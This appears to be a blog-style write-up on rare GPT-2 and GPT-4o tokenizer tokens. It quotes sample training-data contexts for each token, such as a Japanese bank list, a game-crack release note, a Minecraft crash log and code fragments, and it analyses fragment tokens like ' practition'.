https://t.co/c5n2VSSs5L — Ripple (@Ripple) 2018年11月15日\n\nタイの銀行\n\nアユタヤ銀行(Krungsri)*\n\nアユタヤ銀行(Bank of Ayudhya/Krungsri)は、タイで5番目に大きい商業銀行です。同行は2017年6月にリップルを採用することを発表しました。\n\n2017年10月にはリップル社から公式に同行が RippleNet に参加することが発表されました。\n\nサイアム商業銀行 *\n\nサイアム商業銀行(Siam Commercial Bank)は、1905年に設立されたタイで最も歴史の古い商業銀行です。主要株主はタイ国財務省、王室財産管理局となっており、王室系の銀行でもあります。サイアム商業銀行は2016年9月にRippleソリューションの採用を表明しました。\n\n日本の銀行\n\n七十七銀行 **\n\n七十七銀行は、宮城 県仙台市に本店を置く東北6県では最大手の大手地方銀行です。同行は2016年10月に SBI Ripple Asia が主導する『ブロックチェーン技術等を活用した国内外為替一元化検討に関するコンソーシアム』への参加を発表しました。\n\nイオン銀行 **\n\nイオン銀行は、セブン銀行とともに『新たな形態の銀行』に分類されるイオングループの銀行。イオングループのほぼすべての店舗にATMを設置しています。同行は2016年10月に SBI Ripple Asia が主導するコンソーシアムへの参加を発表してい ます。\n\n秋田銀行 **\n\n秋田銀行は、秋田県秋田市に本店を置く地方銀行です。同行は2017年5月に SBI Ripple Asia が主導する『ブロックチェーン技術等を活用した国内外為替一元化検討に関するコンソーシアム』への参加を発表しました。\n\n青森銀行 **\n\n青森銀行は、青森県青森市に本店を置く青森県最大の地方銀行です。同行は2016年10月に SBI Ripple Asia が主導する『ブロックチェーン技術等を活用した国内外為替一元化検討に関するコンソーシアム』への参加を発表しまし た。\n\n足利銀行 **\n\n足利銀行は、めぶきフィナンシャルグループ傘下の栃木県宇都宮市に本店を置く地方銀行です。同行は2016年10月に SBI Ripple Asia が主導する『ブロックチェーン技術等を活用した国内外為替一元化検討に関するコンソ ーシアム』への参加を発表しました。\n\n阿波銀行 **\n\n阿波銀行は、徳島県徳島市に本店を置く地方銀行です。同行は2016年10月に SBI Ripple Asia が主導する『ブロックチェーン技術等を活用した国内外為替一元化検討に関するコンソーシア ム』への参加を発表しました。\n\n岩手銀行 **\n\n岩手銀行は、岩手県盛岡市に本店を置く岩手県最大の地方銀行です。同行は2017年4月に SBI Ripple Asia が主導する『ブロックチェーン技術等を活用した国内外為替一元化検討に関するコンソーシアム』への参加を発表しました。\n\n名古屋銀行 **\n\n名古屋銀行は、愛知県名古屋市に本店を置く第二地方銀行です。同行は2017年5月に SBI Ripple Asia が主導する『ブロックチェーン技術等を活用した国内外為替一元化検討に関するコンソーシアム』への参加を発表しました。\n\n沖縄銀行 **\n\n沖縄銀行は、沖縄県那覇市久茂地に本店を置く、信託併営の地方銀行です。同行は2017年4月に SBI Ripple Asia が主導する『ブロックチェーン技術等を活用した国内外為替一元化検討に関するコンソーシアム』への参加を発表しました。\n\n三菱UFJ銀行 *\n\n三菱UFJ銀行は、三菱UFJフィナンシャル・グループ傘下の都市銀行で、日本の3大メガバンクの一つです。同行は2016年11月に発表されたシンガポール中央銀行が主導するリッ プルを利用した国際送金実験に参加しています。また、2017年3月にはリップルを利用する国際送金サービスの世界連合である Global Payments Steering Group(GPSG)への参

Prompting GPT2 with just "ーン" mostly results in very specifically Puzzles and Dragons content, referencing キン肉族超人予言書, 裏覚醒, and other common elements in the series. My best guess is that it's another member of the Dragon cluster (probably).

 

 

48396 ÛÛ 3

[494, 155, 494]

It's part of the description text on torrent sites for cracked video games . Whoever wrote this did not think highly of CODEX.

ÛÛ

titled a guest Nov 25th, 2016 5,195 Never a guest5,195Never\n\nNot a member of Pastebin yet? Sign Up , it unlocks many cool features!\n\nrawdownloadcloneembedreportprint text 4.82 KB ßÜÜ ß ÜÜÜÜÜÜ²Ý ÞÛÛÜ ²ÛÜ ßÜ °²²ÛÛÛÛÛÛÛß ÜÛÛÛÛÝÞÛÛÝ Þ² ÜÜÜÜÜÜ Ü ÛßÛÛÛÛÛÛ²°Ü²ÛÛÛÛÛÜÛÛÛ² °ÛÝÜÜÜ Ü ÜÜÜÜÜÜ Û ÞÝÞÝÞÛÛÛÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÝ ÛÝ ÞÝ Û Û ² ²ÛÛÛÛÛÛÛÜÛÛÛÛÛÛÛÛÛÛÛÛÝÞÛÛ ² Û Û Ü ÞÝ Þ²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÜÛÛÛ ÞÝ Ü Û Û ÞÝÞÛ ßßßßß²²ÛÛÛÛÛÛÛÛÛßßß ²²° ÛÝÞÝ Û Û Û°²Ý Ü²Ü ÛÛÛÛÛ° °ÛÝ Þ²°Û Û ÝÜ ÞÝ ÞÛ ß ²²ÜÜÜܲ² ÛÜÜÛÛÛÛÛÛÝ ß ÛÝ ÞÝ ÜÞ ÞÝ ²Ü ß²Ü ÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛ²² Ü²ß Ü² ÞÝ ÝßÜ ßßÜÜ°ßÜ ßß²²ÛÛÛÝ ÞÛ°ÜÜÜÜ ßß Üß°ÜÜßß ÜßÞ Ü Û ßßÜÜ ßßÜßÜ ÛÛÛßßßßßß ²ÛÛÛ° ÜßÜßß ÜÜßß Û ÞÝ Û ß²²Ü ÞÝÞÝ ÜÜÜ ÞÛÛÛÝ ÞÛÛ²ÝÞÝÞÝ Ü²ß Û Ü Ü Üß Û Ü ÞÛÛÝ°Û² ÞÛ²Ý °²ÛÛ² ²Û°ÞÛÜ Û ÞÝ ÞÝ ÜßÜÜß Û ÞÝ ÛÛÞ²Üß ÜÜßßßÛÛÜÜ ßܲÝÞÝ ßÜÜÛ° Üß ÞݲÛÝ ß ÜÜÛ°ÞÛ²ß ÜÛÛÛ ÛÛ²² ²ß ܲÛÛß ÜßÜÜß ²ÛÛÛ² ܲÛÛß ÛÛÝ ²²ÛÛÝ ÞÛÛÛÛÝ ÜßÜÜß ÞÛÛÛÝ ÞݲÛÝ ÞÛÛÛÛÝ ÞÛÛÛÝ Þ²² ÞÛÛÛÛ ÛÛÛÛÛ ÞݲÛÝ °²ÛÛÛ ²ÛÛÛ² ÛÛÛÛÛ °²ÛÛÛ °ÛÛÝ ÜÜÜÜÛÛÛÛÛÛÛÛ ÞÛÛÛÛÝ ²ÛÛÛ² ÜÜÛÛÛ²° ÞÛÛÛÛÝ °ÛÛÛÛÛ ÜÜÛÛÛ²ÞÛÛÝ °ÛÛÛ²²ß ßÛÛÛÛÝ ÛÛÛÛÛ ÞÛÛÛÛÝ°ÛÛÛÛÛÛß ÞÛÛÛÛÛÛÛ² ²²ÛÝ ÞÛÛÛÛݲ²ÛÛÛß ÛÛÛ ²²ÛÛÛ ÜÛÛÛÛÛÛÛÛÛÛÛÛ²²ÛÛÛÛÛÛ²ÞÛÛÛÛÛÝ ÞÛÛÛ°ÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛÛÛÛÛÛÝ °ÛÛÛ ÞÛÛÛÛÝ ²²ÛÛÛÛÝ ÞÛÛÛÛÛÛÛÛ°ÛÛÛÛÛÛÛÛÛÛ ÞÛ²² ÞÛÛÛÛ² ÛÛÛÛ ÞÛÛÛÛÛÛÛÛ ÞÛÛÛ°ÞÛÛÛÛÝ ÞÛÛÛÛÛÛÛ ²ÛÛÛÛÛÛÛ ÞÛÛÛÛÛÛÛÛÛÝ ÛÛÛÝ ÛÛÛÛÛÝ ÛÛÛÛÝÜÛÛÛÛÛÛÛÛÛÝ ÞÛÛÛݲ²ÛÛÛ ÛÛÛÛÛÛ²² ßß²²ÛÛÝ ÛÛÛÛÛÛÛÛÛÛÜÜÛÛÛÝ ÞÛÛÛÛ² ÞÛÛÛÛÛÛÛ²²ß²ÛÛÛÛܲ²ÛÛÛÛÛÛÛÛ ÛÛÛÛÛÝ °ÛÛÛÝ ÞÛÛÛÛ² ßßß²²ÛÛÛÝ ÜÛÛÛÛÛÝ ÞÛÛÛ²²ÛÛÛÜÜÜ°°ßßßÛÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛ²²ß ÞÛÛÛÝ ÜÛÛÛÛÛÝ Û ÞÛÛÛÛÛÛÛÛ²²ß ÛÛÛÛ ßßßÛÛÛÛÜÜÜÜÜ°° ßßßßß nERv ÞÛÛÛÛÛÛÛÛ²²ß Û Þ²²ÛÛÛÛßßß ßßßß ÜßßßÛÛÛÛÛÛ Þ²²ÛÛÛÛßßß Û Û ²²ÛÛ Û Û Û Û ÜßßÛ Üßß ² ÜßßÜ ÜßßÜ ÜßÜ Üßß ÜßÜ Û ÛÜÜÜ Ûß² ²ß Ü Û Û ² Ûßß² ² Û ²ß Ü Û ² ÜÜÜÛ Û ßßßß ßßß ßß ß ßßß ßßßß ßßß Just don\'t ask :..... RELEASE.DATE .. PROTECTION .......: Denuvo x64 0 :.......... DISC(S) .. GAME.TYPE ........: //// Üßß ÜßßÜ ÜßÜßÜ Üßß ß ÜßßÜ ÜßßÜ ÜßßÜ Üß ßßßßßßßßßßßßßßßß Û ß² Ûßß² Û ² ²ß Ü Û Û ² ²ß Û ² ßßßÛ ßßßßßßßßßßßßßßßß ßß ß ß ß ßßßß ß ß ß ßß ßß Notes: ~~~~~~ Just to announce , our team think it\'s time to publish a PROPER Denuvo crack. Greets to CPY for "cracking" the games but their so called "crack" was only emulation where they patched the remaining ingame triggers and giving a instruction to the exe to generate a dbdata file. Also we forgot to say: CODEX are just a bunch of idiots who can emulate a Steam DRM. New Year 2017 is ahead of us so expect more soon ;) Greets to 0x0007 and Diam0nd Üßß ÜßßÛ ÜßßÜ ² Ü ÜßßÛ ÜßßÜ ÜßßÜ ²ÜÜ Üßß Üß ßßßßßßßßßßßß Û ß² Ûß² Û ² Û ² Ûßß Û ² Û ² Û Ü ²ß Ü ßßßÛ ßßßßßßßßßßßßß ßß Û ßß ßß ß ß ßß ßßß ßßßß ßß https://google.com/patents/EP2998895A1\n\nRAW Paste Data\n\nßÜÜ ß ÜÜÜÜÜÜ²Ý ÞÛÛÜ ²ÛÜ ßÜ °²²ÛÛÛÛÛÛÛß ÜÛÛÛÛÝÞÛÛÝ Þ² ÜÜÜÜÜÜ Ü ÛßÛÛÛÛÛÛ²°Ü²ÛÛÛÛÛÜÛÛÛ² °ÛÝÜÜÜ Ü ÜÜÜÜÜÜ Û ÞÝÞÝÞÛÛÛÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÝ ÛÝ ÞÝ Û Û ² ²ÛÛÛÛÛÛÛÜÛÛÛÛÛÛÛÛÛÛÛÛÝÞÛÛ ² Û Û Ü ÞÝ Þ²ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÜÛÛÛ ÞÝ Ü Û Û ÞÝÞÛ ßßßßß²²ÛÛÛÛÛÛÛÛÛßßß ²²° ÛÝÞÝ Û Û Û°²Ý Ü²Ü ÛÛÛÛÛ° °ÛÝ Þ²°Û Û ÝÜ ÞÝ ÞÛ ß ²²ÜÜÜܲ² ÛÜÜÛÛÛÛÛÛÝ ß ÛÝ ÞÝ ÜÞ ÞÝ ²Ü ß²Ü ÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛ²² Ü²ß Ü² ÞÝ ÝßÜ ßßÜÜ°ßÜ ßß²²ÛÛÛÝ ÞÛ°ÜÜÜÜ ßß Üß°ÜÜßß ÜßÞ Ü Û ßßÜÜ ßßÜßÜ ÛÛÛßßßßßß ²ÛÛÛ° ÜßÜßß ÜÜßß Û ÞÝ Û ß²²Ü ÞÝÞÝ ÜÜÜ ÞÛÛÛÝ ÞÛÛ²ÝÞÝÞÝ Ü²ß Û Ü Ü Üß Û Ü ÞÛÛÝ°Û² ÞÛ²Ý °²ÛÛ² ²Û°ÞÛÜ Û ÞÝ ÞÝ ÜßÜÜß Û ÞÝ ÛÛÞ²Üß ÜÜßßßÛÛÜÜ ßܲÝÞÝ ßÜÜÛ° Üß ÞݲÛÝ ß ÜÜÛ°ÞÛ²ß ÜÛÛÛ ÛÛ²² ²ß ܲÛÛß ÜßÜÜß ²ÛÛÛ² ܲÛÛß ÛÛÝ ²²ÛÛÝ ÞÛÛÛÛÝ ÜßÜÜß ÞÛÛÛÝ ÞݲÛÝ ÞÛÛÛÛÝ ÞÛÛÛÝ Þ²² ÞÛÛÛÛ ÛÛÛÛÛ ÞݲÛÝ °²ÛÛÛ ²ÛÛÛ² ÛÛÛÛÛ °²ÛÛÛ °ÛÛÝ ÜÜÜÜÛÛÛÛÛÛÛÛ ÞÛÛÛÛÝ ²ÛÛÛ² ÜÜÛÛÛ²° ÞÛÛÛÛÝ °ÛÛÛÛÛ ÜÜÛÛÛ²ÞÛÛÝ °ÛÛÛ²²ß ßÛÛÛÛÝ ÛÛÛÛÛ ÞÛÛÛÛÝ°ÛÛÛÛÛÛß ÞÛÛÛÛÛÛÛ² ²²ÛÝ ÞÛÛÛÛݲ²ÛÛÛß ÛÛÛ ²²ÛÛÛ ÜÛÛÛÛÛÛÛÛÛÛÛÛ²²ÛÛÛÛÛÛ²ÞÛÛÛÛÛÝ ÞÛÛÛ°ÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛÛÛÛÛÛÝ °ÛÛÛ ÞÛÛÛÛÝ ²²ÛÛÛÛÝ ÞÛÛÛÛÛÛÛÛ°ÛÛÛÛÛÛÛÛÛÛ ÞÛ²² ÞÛÛÛÛ² ÛÛÛÛ ÞÛÛÛÛÛÛÛÛ ÞÛÛÛ°ÞÛÛÛÛÝ ÞÛÛÛÛÛÛÛ ²ÛÛÛÛÛÛÛ ÞÛÛÛÛÛÛÛÛÛÝ ÛÛÛÝ ÛÛÛÛÛÝ ÛÛÛÛÝÜÛÛÛÛÛÛÛÛÛÝ ÞÛÛÛݲ²ÛÛÛ ÛÛÛÛÛÛ²² ßß²²ÛÛÝ ÛÛÛÛÛÛÛÛÛÛÜÜÛÛÛÝ ÞÛÛÛÛ² ÞÛÛÛÛÛÛÛ²²ß²ÛÛÛÛܲ²ÛÛÛÛÛÛÛÛ ÛÛÛÛÛÝ °ÛÛÛÝ ÞÛÛÛÛ² ßßß²²ÛÛÛÝ ÜÛÛÛÛÛÝ ÞÛÛÛ²²ÛÛÛÜÜÜ°°ßßßÛÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛ²²ß ÞÛÛÛÝ ÜÛÛÛÛÛÝ Û ÞÛÛÛÛÛÛÛÛ²²ß ÛÛÛÛ ßßßÛÛÛÛÜÜÜÜÜ°° ßßßßß nERv ÞÛÛÛÛÛÛÛÛ²²ß Û Þ²²ÛÛÛÛßßß ßßßß ÜßßßÛÛÛÛÛÛ Þ²²ÛÛÛÛßßß Û Û ²²ÛÛ Û Û Û Û ÜßßÛ Üßß ² ÜßßÜ ÜßßÜ ÜßÜ Üßß ÜßÜ Û ÛÜÜÜ Ûß² ²ß Ü Û Û ² Ûßß² ² Û ²ß Ü Û ² ÜÜÜÛ Û ßßßß ßßß ßß ß ßßß ßßßß ßßß Just don\'t ask :..... RELEASE.DATE .. PROTECTION .......: Denuvo x64 0 :.......... DISC(S) .. GAME.TYPE ........: //// Üßß ÜßßÜ ÜßÜßÜ Üßß ß ÜßßÜ ÜßßÜ ÜßßÜ Üß ßßßßßßßßßßßßßßßß Û ß² Ûßß² Û ² ²ß Ü Û Û ² ²ß Û ² ßßßÛ ßßßßßßßßßßßßßßßß ßß ß ß ß ßßßß ß ß ß ßß ßß Notes: ~~~~~~ Just to announce , our team think it\'s time to publish a PROPER Denuvo crack. Greets to CPY for "cracking" the games but their so called "crack" was only emulation where they patched the remaining ingame triggers and giving a instruction to the exe to generate a dbdata file. Also we forgot to say: CODEX are just a bunch of idiots who can emulate a Steam DRM. New Year 2017 is ahead of us so expect more soon ;) Greets to 0x0007 and Diam0nd Üßß ÜßßÛ ÜßßÜ ² Ü ÜßßÛ ÜßßÜ ÜßßÜ ²ÜÜ Üßß Üß ßßßßßßßßßßßß Û ß² Ûß² Û ² Û ² Ûßß Û ² Û ² Û Ü ²ß Ü ßßßÛ ßßßßßßßßßßßßß ßß Û ßß ßß ß ß ßß ßßß ßßßß ßß https://google.com/patents/EP2998895A1

 

24440 ュ 1338

 "通常のプレビュ" (preview) is present on every post on 2ch, a popular Japanese imageboard. 

Also, 天空龍ラッシュ! (Skydragon) is a location in P&D, so add another to the Dragon cluster.

 

39165 catentry 4

[194, 180, 73, 9]

 "Attributes" : { "size_20":"2", "color_Marine":"1" } }, { "catentry_id" : "10277803", "channelAvailability" : "BuyableInstoreAndOnline", "inventoryQuantity" : 

 "Attributes" : { "size_16":"2", "color_Marine":"1" } }, { "catentry_id" : "10277804", "channelAvailability" : "BuyableInstoreAndOnline", "inventoryQuantity" : "22.0", 

It's a format for inventory management

 

39253  UCHIJ 5

[340, 262, 234, 36, 8]

Always part of the string "UCHIJAAAA", found in mod pack names as part of Minecraft crash logs.

UCHIJAAAA


---- Minecraft Crash Report ---- WARNING: coremods are present: LoadingPlugin (Quark-r1.0-59.jar) ChiselCorePlugin (Chisel-MC1.10.2-0.0.7.3.jar) DepLoader (BrandonsCore-1.10.2-2.1.1.61-universal.jar) LoadingHook (Mekanism-1.10.2-9.2.0.294.jar) FMLPlugin (InventoryTweaks-1.62-dev-66.jar) BookshelfLoadingPlugin (Bookshelf-1.10.2-1.4.2.335.jar) ForgelinPlugin (Forgelin-1.1.0.jar) LoadingPlugin (RandomThings-MC1.10.2-3.7.7.jar) LoadingPlugin (ResourceLoader-MC1.9.4-1.5.1.jar) AppleCore (AppleCore-mc1.10.2-2.1.0.jar) TransformerLoader (OpenComputers-MC1.10.2-1.6.0.4.jar) CoreMod (Aroma1997Core-1.9.4-1.1.1.0.jar) AppEngCore (appliedenergistics2-rv4-alpha-6.jar) IC2core (industrialcraft-2-2.6.105-ex110.jar) ShetiPhian-ASM (shetiphiancore-1.10.0-3.3.4.jar) DepLoader (CodeChickenCore-1.10.2-2.3.5.91-universal.jar) LoadingPlugin (Bloodmoon-MC1.9.4-1.4.1.jar) MalisisCorePlugin (malisiscore-1.10.2-4.2.7.jar) Default Options (DefaultOptions_1.10.2-6.1.5.jar) EnderCorePlugin (EnderCore-1.10.2-0.4.1.58-beta.jar) CCLCorePlugin (CodeChickenLib-1.10.2-2.4.1.101-universal.jar) CCLCorePlugin (CodeChickenLib-1.10.2-2.4.3.124-universal.jar) Contact their authors BEFORE contacting forge // Shall we play a game? Time: 11/19/16 12:32 PM Description: Ticking player java.lang.IllegalArgumentException: Cannot set property PropertyDirection{name=facing, clazz=class net.minecraft.util.EnumFacing, values=[down, up, north, south, west, east]} to null on block minecraft:piston, it is not an allowed value at net.minecraft.block.state.BlockStateContainer$StateImplementation.func_177226_a(BlockStateContainer.java:229) at net.minecraft.block.BlockPistonBase.func_176203_a(BlockPistonBase.java:424) at biomesoplenty.common.handler.AchievementEventHandler.onItemPickup(AchievementEventHandler.java:59) at net.minecraftforge.fml.common.eventhandler.ASMEventHandler_221_AchievementEventHandler_onItemPickup_ItemPickupEvent.invoke(.dynamic) at net.minecraftforge.fml.common.eventhandler.ASMEventHandler.invoke(ASMEventHandler.java:90) at net.minecraftforge.fml.common.eventhandler.EventBus.post(EventBus.java:185) at net.minecraftforge.fml.common.FMLCommonHandler.firePlayerItemPickupEvent(FMLCommonHandler.java:580) at net.minecraft.entity.item.EntityItem.func_70100_b_(EntityItem.java:410) at net.minecraft.entity.player.EntityPlayer.func_71044_o(EntityPlayer.java:578) at net.minecraft.entity.player.EntityPlayer.func_70636_d(EntityPlayer.java:570) at net.minecraft.entity.EntityLivingBase.func_70071_h_(EntityLivingBase.java:2013) at net.minecraft.entity.player.EntityPlayer.func_70071_h_(EntityPlayer.java:233) at net.minecraft.entity.player.EntityPlayerMP.func_71127_g(EntityPlayerMP.java:303) at net.minecraft.network.NetHandlerPlayServer.func_73660_a(NetHandlerPlayServer.java:162) at net.minecraftforge.fml.common.network.handshake.NetworkDispatcher$1.func_73660_a(NetworkDispatcher.java:213) at net.minecraft.network.NetworkManager.func_74428_b(NetworkManager.java:287) at net.minecraft.network.NetworkSystem.func_151269_c(NetworkSystem.java:180) at net.minecraft.server.MinecraftServer.func_71190_q(MinecraftServer.java:732) at net.minecraft.server.MinecraftServer.func_71217_p(MinecraftServer.java:613) at net.minecraft.server.integrated.IntegratedServer.func_71217_p(IntegratedServer.java:240) at net.minecraft.server.MinecraftServer.run(MinecraftServer.java:471) at java.lang.Thread.run(Thread.java:745) A detailed walkthrough of the error, its code path and all known details is as follows: --------------------------------------------------------------------------------------- -- Head -- Thread: Server thread Stacktrace: at net.minecraft.block.state.BlockStateContainer$StateImplementation.func_177226_a(BlockStateContainer.java:229) at net.minecraft.block.BlockPistonBase.func_176203_a(BlockPistonBase.java:424) at biomesoplenty.common.handler.AchievementEventHandler.onItemPickup(AchievementEventHandler.java:59) at net.minecraftforge.fml.common.eventhandler.ASMEventHandler_221_AchievementEventHandler_onItemPickup_ItemPickupEvent.invoke(.dynamic) at net.minecraftforge.fml.common.eventhandler.ASMEventHandler.invoke(ASMEventHandler.java:90) at net.minecraftforge.fml.common.eventhandler.EventBus.post(EventBus.java:185) at net.minecraftforge.fml.common.FMLCommonHandler.firePlayerItemPickupEvent(FMLCommonHandler.java:580) at net.minecraft.entity.item.EntityItem.func_70100_b_(EntityItem.java:410) at net.minecraft.entity.player.EntityPlayer.func_71044_o(EntityPlayer.java:578) at net.minecraft.entity.player.EntityPlayer.func_70636_d(EntityPlayer.java:570) at net.minecraft.entity.EntityLivingBase.func_70071_h_(EntityLivingBase.java:2013) at net.minecraft.entity.player.EntityPlayer.func_70071_h_(EntityPlayer.java:233) -- Player being ticked -- Details: Entity Type: null (net.minecraft.entity.player.EntityPlayerMP) Entity ID: 402 Entity Name: desagas Entity's Exact location: 157.03, 46.00, -15.45 Entity's Block location: World: (157,46,-16), Chunk: (at 13,2,0 in 9,-1; contains blocks 144,0,-16 to 159,255,-1), Region: (0,-1; contains chunks 0,-32 to 31,-1, blocks 0,0,-512 to 511,255,-1) Entity's Momentum: 0.00, -0.08, 0.00 Entity's Passengers: [] Entity's Vehicle: ~~ERROR~~ NullPointerException: null Stacktrace: at net.minecraft.entity.player.EntityPlayerMP.func_71127_g(EntityPlayerMP.java:303) at net.minecraft.network.NetHandlerPlayServer.func_73660_a(NetHandlerPlayServer.java:162) at net.minecraftforge.fml.common.network.handshake.NetworkDispatcher$1.func_73660_a(NetworkDispatcher.java:213) at net.minecraft.network.NetworkManager.func_74428_b(NetworkManager.java:287) -- Ticking connection -- Details: Connection: net.minecraft.network.NetworkManager@5881f033 Stacktrace: at net.minecraft.network.NetworkSystem.func_151269_c(NetworkSystem.java:180) at net.minecraft.server.MinecraftServer.func_71190_q(MinecraftServer.java:732) at net.minecraft.server.MinecraftServer.func_71217_p(MinecraftServer.java:613) at net.minecraft.server.integrated.IntegratedServer.func_71217_p(IntegratedServer.java:240) at net.minecraft.server.MinecraftServer.run(MinecraftServer.java:471) at java.lang.Thread.run(Thread.java:745) -- System Details -- Details: Minecraft Version: 1.10.2 Operating System: Windows 10 (amd64) version 10.0 Java Version: 1.8.0_25, Oracle Corporation Java VM Version: Java HotSpot(TM) 64-Bit Server VM (mixed mode), Oracle Corporation Memory: 902588632 bytes (860 MB) / 7239892992 bytes (6904 MB) up to 11453595648 bytes (10923 MB) JVM Flags: 4 total; -XX:HeapDumpPath=MojangTricksIntelDriversForPerformance_javaw.exe_minecraft.exe.heapdump -Xmx12288m -Xms256m -XX:PermSize=256m IntCache: cache: 0, tcache: 9, allocated: 1, tallocated: 93 FML: MCP 9.32 Powered by Forge 12.18.2.2125 Optifine OptiFine_1.10.2_HD_U_D2 170 mods loaded, 170 mods active States: 'U' = Unloaded 'L' = Loaded 'C' = Constructed 'H' = Pre-initialized 'I' = Initialized 'J' = Post-initialized 'A' = Available 'D' = Disabled 'E' = Errored UCHIJAAAA mcp{9.19} [Minecraft Coder Pack] (minecraft.jar) UCHIJAAAA FML{8.0.99.99} [Forge Mod Loader] (forge-1.10.2-12.18.2.2125.jar) UCHIJAAAA Forge{12.18.2.2125} [Minecraft Forge] (forge-1.10.2-12.18.2.2125.jar) UCHIJAAAA appliedenergistics2-core{rv4-alpha-6} [Applied Energistics 2 Core] (minecraft.jar) UCHIJAAAA Aroma1997Core{${version}} [Aroma1997Core] (Aroma1997Core-1.9.4-1.1.1.0.jar) UCHIJAAAA OpenComputers|Core{1.6.0.4} [OpenComputers (Core)] (minecraft.jar) UCHIJAAAA mantle{1.10.2-1.1.1.194} [Mantle]

 

47182 :""},{ 21       //    23785 "]=> 32    //     32047  "$:/ 3    

//    47182 :""},{ 21

Parts of code.

{ ["scope"]=> string(7) "website" ["viewed_count"]=> string(1) "5"
 "$:/core/images/chevron-right", "tags": "$:/tags/Image"
playerId","value":54674,"displayValue":"54674"},{"name":"retiredDescription","value":0,"displayValue":""},{"name

21807 \\\\\\\\ 45

Long sequences of the above are common on bitcoinmagazine.com. There is also ASCII art.

\\\\\\\\

\\\\\\\\\\\\\\\'s time for some investigation. The results are somewhat counter-intuitive. That makes the wh", "y looked at on a day to day basis.Value changes are measured as relative or percentage changes. That\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s because only relative changes are comparable between different assets and over time. To gi", "ty tells us how much the BTC vs USD exchange rate disperses around the mean over a given period. Let\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s look at some more historical data to put the Bitcoin volatility into perspective.Thinking of historical Bitcoin volatility, it\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s no big news that it was going through the roof. Ho", "he Bitcoin volatility into perspective.Thinking of historical Bitcoin volatility, it\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s no big news that it was going through the roof. However, what does deserve attention is ho", 'ing 2013. Absolute changes in that time were massive. But looking at relative figures tells us, that\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s not the whole story

 'Text strings [ edit ]\n\n\\ Rossetta Code Write language name in 3D ASCII\n\n\\ Simple Method\n\n\n\n: l1 ." /\\\\\\\\\\\\\\\\\\\\\\\\\\ /\\\\\\\\ /\\\\\\\\\\\\\\ /\\\\\\\\\\\\\\\\\\\\\\\\\\ /\\\\\\ /\\\\\\" CR ;\n\n: l2 ." \\/\\\\\\///////// /\\\\\\//\\\\\\ /\\\\\\/////\\\\\\ \\//////\\\\\\//// \\/\\\\\\ \\/\\\\\\" CR ', '\\//// \\/\\\\\\ \\/\\\\\\" CR ;\n\n: l3 ." \\/\\\\\\ /\\\\\\/ \\///\\\\\\ \\/\\\\\\ \\/\\\\\\ \\/\\\\\\ \\/\\\\\\ \\/\\\\\\" CR ;\n\n: l4 ." \\/\\\\\\\\\\\\\\\\\\ /\\\\\\ \\//\\\\\\ \\/\\\\\\\\\\\\\\\\\\/ \\/\\\\\\ \\/\\\\\\\\\\\\\\\\\\\\\\\\\\" CR ;\n\n: l5 ." \\/\\\\\\///// \\/\\\\\\ \\/\\\\\\ \\/\\\\\\////\\\\\\ \\/\\\\\\ \\/\\\\\\///////\\\\\\" CR ;\n\n: l6 ." \\/\\\\\\ ', '\n\n\n\n: "FORTH" cr L1 L2 L3 L4 L5 L6 L7 L8 l9 ;\n\n\n\n( test at the console )\n\npage "forth"\n\n\n\nOutput:\n\nnstant binary returns boolean\n\nreturn \\ isTrue ( )\n\n\n\nOutput:\n\nn\nTranslation of: Python\n\nimport strutils\n\n\n\nconst nim = """\n\n# # ##### # #\n\n#', 't)\n\n(maplist \'((X) (transform X "/" "\\\\")) (cdr Lst)) )\n\n\n\n(bye)\n\nOutput:\n\nn\nIf OpenConsole ( )\n\nPrintN ( " ////\\ ////\\ ////| " )\n\nPrintN ( " //// \\ __ //// \\ __ |XX', 'e:\n\nprocedure\n\nreturn 1 == 1\n\n\n\nisFalse:\n\nprocedure\n\nreturn \\ isTrue ( )\n\nOutput:\n\nn\nsimpler, shorter [ edit ]\n\nThis is a version of the above REXX program', "/*j*/ /*stick a fork in it, we're all done. */\n\noutput when using the default input:\n\n

 

 

17629  practition 13

I took that to be a personal challenge! I did a more comprehensive writeup here.

That's " practition" with a space. It is not a tokenization of " practitioner" or " practitioners", since those have their own tokenizations. The examples in the dataset were mis-spellings, line breaks, and rare variants like "practitioning".

17629 ' practition' 13
32110 ' practitioner' 9942
24068 ' practitioners' 14646

My go-to answer for such situations is that the tokenizer behavior was bugged or changed during training. But that doesn't work here, since we see the exact same pattern for the GPT4o tokenizer!

31271 ' practition' 
55472 ' practitioner' 
43195 ' practitioners' 

This one took me days to work out, but the results were illuminating.

It started when I found a similar pattern with a lot of low-frequency tokens that seem like parts of common words.

token examples

 

4690 'ortunately' 14
6668 'fortunately' 4329
39955 ' fortunately' 10768
31276 'Fortunately' 15667
 
7105 ' volunte' 34
41434 ' volunteering' 10598
32730 ' volunteered' 14176
